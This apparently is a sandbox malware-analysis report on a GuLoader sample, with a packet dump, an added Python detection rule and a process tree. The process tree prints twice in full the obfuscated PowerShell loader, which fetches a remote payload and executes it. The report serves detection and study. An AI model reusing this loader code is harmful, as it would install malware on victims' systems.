                                                                          Data Ascii: (54xw.,y<(K85"dl.c&PtxkTV:^[9ER:YF$50f2q5sH7|,5}|\a"C$fvqnAQx"AmT[-V uWkkLo_91%SJ6rRAYH/{ir:Bs>9gQW
2024-05-23 19:01:03 UTC | 16384 | IN
Data Raw: 92 de 88 6b ed 54 b7 c7 52 7d 17 90 33 db 6e 86 b1 cb 4a ac 6f 6e a1 f5 d2 1e 2a 6e 5d f6 0d 5b 36 bb 7d 43 8c d5 bf eb f1 13 52 dd 56 df 43 4a 4d 23 cd 1e 8c 73 0d d5 1d 49 78 53 40 55 03 6a 6d 72 b3 ad d0 85 7d 0f 63 9f 97 ef 8c ad 20 41 3c 0b 86 47 7f e2 7a 42 76 48 bf 3e 36 e2 6a cd 49 17 b1 59 99 29 70 d2 5c bc d3 39 29 05 f1 da ee b1 8c 03 94 c3 bb 1e 5b 9c bc c4 1e 13 42 ec f6 5f 45 8b 76 d7 3c ba 0e f2 e7 57 b8 14 fb ac 7a ac 60 59 55 16 91 72 69 91 aa 61 bc f2 af 3e ba 3d df 40 af 9f 7e 21 13 1c e2 92 63 c8 96 62 8d bc fd 69 ce c9 f9 db 58 7e 12 0d f8 2b 78 66 d1 17 2c a4 0f 49 3f 6e 4e b1 5e 7c 1c ff 57 48 f6 ed a9 33 08 0a 73 c9 cd 58 42 77 f6 83 e8 83 81 e2 aa 63 ad 53 51 8d 76 84 88 a9 26 28 f1 65 36 58 a3 7d 15 ee b3 60 0b 2d 16 5a 90 14 a9
                                                                          Data Ascii: kTR}3nJon*n][6}CRVCJM#sIxS@Ujmr}c A<GzBvH>6jIY)p\9)[B_Ev<Wz`YUria>=@~!cbiX~+xf,I?nN^|WH3sXBwcSQv&(e6X}`-Z
2024-05-23 19:01:03 UTC | 15861 | IN
Data Raw: 39 dd 01 d6 3d db c3 5d 40 54 41 fa 8d 5e c9 d0 c4 7a 40 cc 89 27 9a 84 eb f4 4b 7d f6 9a 9f 17 9a 36 fa b3 c1 05 23 94 30 6b 8f a3 90 ac 15 2f a3 de 56 9b 3a 6d c1 ed e6 f5 ad 54 7a 5b 9e df 4e 78 4d dc 2c 2b 21 d1 8f 5f ff 9c 2c 70 36 1e dc 58 c8 8a fd cb 68 57 f5 4a c2 31 c2 63 85 5a 8d 27 bc 05 3d 06 0c cf 73 ac b4 1f 62 92 92 85 98 02 77 52 d9 f4 02 45 66 67 e2 c3 27 63 37 df f6 48 b1 10 8d 56 6e df 0e d0 58 59 b4 d5 8b 99 95 b2 36 20 33 3a df 90 64 e2 4b 1c 61 2f 24 20 d8 a5 63 bd 7d e7 fd ae b2 da b5 93 5f 7b 0e cc 25 ab 9b 36 7c 52 f4 57 89 b3 41 4b ad 98 92 bc 2f 38 cc 10 ca 2d dc e9 80 c6 27 93 6f ad 1c e5 f4 a1 14 5e 01 3b 3e 83 0f d6 4f 82 39 d8 0a cc 85 a0 eb c5 bb 64 7a 78 e7 8a e4 fc 31 d0 30 ef 6e 2b ef 0a 84 f1 49 76 35 9b 79 9a 6c aa 14
                                                                          Data Ascii: 9=]@TA^z@'K}6#0k/V:mTz[NxM,+!_,p6XhWJ1cZ'=sbwREfg'c7HVnXY6 3:dKa/$ c}_{%6|RWAK/8-'o^;>O9dzx10n+Iv5yl
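The session above is the payload fetch: wab.exe, the Windows Mail address-book binary, requests a 64576-byte file served as an application/octet-stream attachment from fs03n3.sendspace.com and presents a Firefox 121 User-Agent while doing so. That process/User-Agent mismatch, plus an opaque binary attachment landing in a non-browser, is what a detection engineer would key on in proxy or EDR network telemetry. The check below is an added example written for this report, not code from Joe Sandbox or from the sample. The key=value log format and the two benign records are constructed; the wab.exe record carries the values from the HTTP session above. BROWSER_IMAGES, UNEXPECTED_DOWNLOADERS and the rule names are ours.

```python
"""Network-telemetry check for the download recorded above: wab.exe (the Windows Mail
address book) fetching a 64576-byte attachment from sendspace with a Firefox User-Agent.

Added example for this report; not code from Joe Sandbox or the sample.  The key=value
log format and the two benign records are constructed; the wab.exe record carries the
values from the HTTP session above.  BROWSER_IMAGES and the rule names are ours.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed telemetry.  Record 1 = the wab.exe session above; records 2 and 3 are benign.
SAMPLE_LOG = r"""
ts="2024-05-23 19:01:02" proc="C:\Program Files (x86)\Windows Mail\wab.exe" dst=fs03n3.sendspace.com dport=443 method=GET path="/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin" ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" status=200 ctype=application/octet-stream cdisp=attachment filename=jXoEkwyvRCuipiJXijfHFGP97.bin bytes=64576
ts="2024-05-23 19:03:10" proc="C:\Program Files\Mozilla Firefox\firefox.exe" dst=addons.mozilla.org dport=443 method=GET path="/firefox/downloads/file/4321/example.xpi" ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" status=200 ctype=application/x-xpinstall cdisp=attachment filename=example.xpi bytes=120000
ts="2024-05-23 19:04:00" proc="C:\Windows\System32\svchost.exe" dst=ctldl.windowsupdate.com dport=80 method=GET path="/msdownload/update/v3/static/trustedr/en/authrootstl.cab" ua="Microsoft-CryptoAPI/10.0" status=200 ctype=application/octet-stream cdisp=- filename=- bytes=60000
"""

# key=value or key="quoted value" tokens.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# Desktop-browser User-Agent shape; only a real browser engine should send one of these.
BROWSER_UA_RE = re.compile(r"^Mozilla/5\.0 \(.*\).*\b(?:Firefox|Chrome|Edg|Safari)/\d")
BROWSER_IMAGES = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe", "brave.exe", "opera.exe"}
# Signed Windows binaries that should never originate downloads.  wab.exe is the one
# abused in this report; extend the set from your own baseline (our list, not the report's).
UNEXPECTED_DOWNLOADERS = {"wab.exe"}


@dataclass(frozen=True)
class Alert:
    ts: str
    image: str
    rule: str


def parse_record(line: str) -> dict[str, str]:
    """Parse one key=value line into a dict (quoted values may contain spaces)."""
    return {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(rec: dict[str, str]) -> list[str]:
    """Return the names of the rules one record trips (empty list means benign)."""
    image = image_name(rec.get("proc", ""))
    hits: list[str] = []
    # A browser-shaped UA from anything that is not a browser is the process/UA mismatch seen above.
    if BROWSER_UA_RE.search(rec.get("ua", "")) and image not in BROWSER_IMAGES:
        hits.append("browser_ua_from_non_browser")
    # An opaque binary served as a download attachment to a non-browser is a staged-payload pattern.
    if (rec.get("cdisp", "").startswith("attachment")
            and rec.get("ctype") == "application/octet-stream"
            and image not in BROWSER_IMAGES):
        hits.append("binary_attachment_to_non_browser")
    if image in UNEXPECTED_DOWNLOADERS:
        hits.append("unexpected_network_initiator")
    return hits


def scan(log_text: str) -> list[Alert]:
    """Run every rule over every record and collect the alerts."""
    alerts: list[Alert] = []
    for line in log_text.strip().splitlines():
        rec = parse_record(line)
        for rule in evaluate(rec):
            alerts.append(Alert(rec.get("ts", "?"), image_name(rec.get("proc", "")), rule))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"{alert.ts}  {alert.image:<12} {alert.rule}")
```

Only the wab.exe record trips rules, and it trips all three; the Firefox download of an attachment and the svchost.exe octet-stream fetch without a Content-Disposition stay quiet, which is the point of keying on the combination rather than on any single header. The UA pattern is deliberately shape-based (Mozilla/5.0 plus a browser token) so that a later GuLoader build rotating to a Chrome or Edge string is still caught.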


                                                                          Target ID:0
                                                                          Start time:15:00:16
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
                                                                          Imagebase:0x7ff668460000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:15:00:17
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:15:00:17
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf 
jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 
$Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. 
B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
                                                                          Imagebase:0x7ff7be880000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:15:00:17
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:15:00:24
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
                                                                          Imagebase:0x7ff668460000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:15:00:34
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ 
gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') 
;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. 
B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
                                                                          Imagebase:0x4e0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2447508436.00000000086D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2441971801.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2447876168.000000000923E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true
